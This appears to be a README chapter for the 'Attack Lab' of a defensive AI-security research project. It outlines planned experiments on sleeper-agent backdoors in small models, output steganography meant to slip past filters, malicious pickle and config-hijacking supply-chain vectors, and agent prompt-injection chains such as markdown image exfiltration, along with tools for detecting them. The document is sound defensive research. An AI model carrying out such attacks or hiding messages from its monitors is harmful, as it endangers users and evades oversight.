Attack Lab
Proof-of-concept exploit code and experiments validating the threat analysis. Defensive research only.
Purpose
This chapter presents proof-of-concept experiments that validate (or challenge) the claims made in the research analysis. The goal is to move from “the literature says X is possible” to “here is X working on a toy model with measurable results.”
Experiment source code lives in 04-code-lab/attack-lab/. This directory contains the narrative chapter that presents and interprets the results.
Ethics and Legality
All code in this directory is for defensive security research and education only.
- Experiments use small/toy models (not frontier models)
- No code is designed to attack production systems or real users
- Exploit demonstrations are contained and self-targeting
- Results are intended for peer-reviewed publication
- This work follows responsible disclosure principles
Experiment Areas
backdoor-injection/
Train small models with deliberate backdoors (sleeper-agent style). Measure:
- Backdoor activation rate with and without trigger
- Persistence through fine-tuning, RLHF, and quantization
- Detection rates using available tools (Neural Cleanse, STRIP, etc.)
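The core metric above can be sketched as a small helper. This is a minimal illustration, not code from the lab: `backdoor_activation_rate`, the trigger string `|DEPLOY|`, and the stand-in `toy` classifier are all hypothetical names chosen for the example.

```python
def backdoor_activation_rate(classify, inputs, trigger, target_label):
    """Return (rate with trigger, rate without) of target_label predictions."""
    n = len(inputs)
    with_trigger = sum(classify(f"{trigger} {x}") == target_label for x in inputs)
    without = sum(classify(x) == target_label for x in inputs)
    return with_trigger / n, without / n

# Toy stand-in model: flips to label 1 whenever the trigger token appears.
toy = lambda text: 1 if "|DEPLOY|" in text else 0
hit, baseline = backdoor_activation_rate(toy, ["a", "b", "c"], "|DEPLOY|", 1)
```

A well-hidden backdoor should show a near-1.0 rate with the trigger and a baseline rate indistinguishable from a clean model.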
steganography/
Implement and test output encoding schemes. Measure:
- Bits-per-token encoding capacity
- Detectability via statistical analysis
- Bandwidth vs. detectability tradeoff curve
- Effectiveness of output filters against various encoding schemes
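As a concrete (and deliberately naive) instance of an encoding scheme, the sketch below hides one bit per token by choosing between members of synonym pairs; the `PAIRS` table and function names are invented for illustration. Real schemes in the experiments trade capacity against statistical detectability, which this scheme fails badly.

```python
# One-bit-per-token steganography: each covert bit selects which member
# of a synonym pair appears in the generated text.
PAIRS = [("big", "large"), ("fast", "quick"), ("start", "begin"), ("end", "finish")]

def encode(bits):
    """Map a bit sequence to a token sequence (1 bit of capacity per token)."""
    return [PAIRS[i % len(PAIRS)][b] for i, b in enumerate(bits)]

def decode(tokens):
    """Recover the bit sequence from the observed token choices."""
    return [PAIRS[i % len(PAIRS)].index(t) for i, t in enumerate(tokens)]

msg = [1, 0, 1, 1]
cover = encode(msg)
recovered = decode(cover)
```

A frequency count of each pair member against its natural-language base rate is already enough to flag this scheme, which is exactly the detectability axis the experiments measure.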
supply-chain/
Demonstrate non-weight attack vectors. Build:
- Malicious pickle file with benign model behavior + payload
- Tokenizer vocabulary manipulation (silent token remapping)
- Config JSON auto_map hijacking
- GGUF metadata injection
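For the pickle vector, the contained demonstrations pair a benign, self-targeting payload with a static scanner. The sketch below is illustrative only: `Payload` and `suspicious_opcodes` are hypothetical names, and the payload merely calls `print` where a real attack would invoke something dangerous. The scan uses `pickletools.genops`, which disassembles the byte stream without ever loading it.

```python
import pickle
import pickletools

class Payload:
    """Benign, self-targeting stand-in for a malicious pickle payload."""
    def __reduce__(self):
        # A real attack would return (os.system, ("..." ,)); we call print.
        return (print, ("payload executed",))

blob = pickle.dumps(Payload())

def suspicious_opcodes(data):
    """Statically list pickle opcodes that can trigger code execution on load."""
    risky = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ"}
    return [op.name for op, _, _ in pickletools.genops(data) if op.name in risky]

found = suspicious_opcodes(blob)  # flags the REDUCE-based payload without loading it
```

Serializing the payload never executes it; only `pickle.loads` would, which is why opcode-level scanning is the safe inspection path.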
prompt-injection/
Build tool-using agent harnesses and test attack chains:
- Indirect prompt injection via retrieved documents
- Tool-chain exploitation (read -> exfiltrate)
- Confused deputy attacks with authorized tools
- Markdown image exfiltration
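The markdown image vector works because many chat frontends auto-fetch image URLs, so an injected instruction can smuggle secrets out in a query string. A minimal output-side filter for this pattern might look like the sketch below; the regex and `flag_exfil_images` name are assumptions for illustration, and a production filter would need an allowlist rather than a query-string heuristic.

```python
import re

# Matches markdown images and captures the URL: ![alt](https://host/path?query)
IMG = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def flag_exfil_images(text):
    """Return image URLs that carry query parameters (possible exfil channel)."""
    return [url for url in IMG.findall(text) if "?" in url]

safe = "See ![logo](https://example.com/logo.png) for details."
leak = "![x](https://attacker.example/c?d=SECRET_TOKEN)"
```

Running the filter on model output before rendering blocks the zero-click variant of this channel, at the cost of breaking legitimate parameterized image URLs.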
detection/
Evaluate existing detection tools against our injected backdoors:
- Neural Cleanse (adapted for small transformer models)
- STRIP (entropy analysis under perturbation)
- Activation clustering
- Statistical output analysis for steganography detection
- Compare detection rates across backdoor sophistication levels
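The STRIP intuition is simple enough to sketch: blend a suspect input with clean samples and measure the entropy of the resulting predictions. Clean inputs degrade into uncertain predictions; backdoored inputs stay locked to the target class, so their average entropy is anomalously low. The function names and toy predictors below are invented stand-ins, assuming a `predict(x, perturbation)` interface that returns a class-probability list.

```python
import math

def entropy(probs):
    """Shannon entropy (bits) of a predicted class distribution."""
    return -sum(p * math.log2(p) for p in probs if p > 0)

def strip_score(predict, x, perturbations):
    """Average prediction entropy of input x blended with clean samples."""
    return sum(entropy(predict(x, p)) for p in perturbations) / len(perturbations)

# Toy predictors: the "backdoored" input stays confident under perturbation.
backdoored = lambda x, p: [0.98, 0.01, 0.01]
clean = lambda x, p: [0.40, 0.35, 0.25]

low = strip_score(backdoored, "suspect", range(8))
high = strip_score(clean, "benign", range(8))
```

Thresholding the score separates the two populations; picking that threshold across backdoor sophistication levels is what the comparison experiments quantify.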
shared/
Common code used across experiments:
- Model training and loading utilities
- Evaluation harnesses
- Statistical analysis tools
- Results logging and visualization
Setup
cd 04-code-lab
bash setup.sh attack-lab # creates .venv-attack-lab and installs deps
source .venv-attack-lab/bin/activate # Linux/macOS
# or: .venv-attack-lab\Scripts\activate # Windows
See 04-code-lab/requirements/attack-lab.txt for the full dependency list.
Requirements
- Python 3.10+
- PyTorch >= 2.0
- Transformers >= 4.36 (Hugging Face)
- See 04-code-lab/requirements/attack-lab.txt for the complete list
- Additional per-experiment dependencies documented in each subdirectory README
Each experiment subdirectory contains its own README with specific setup, methodology, expected results, and what it proves or disproves from the research analysis.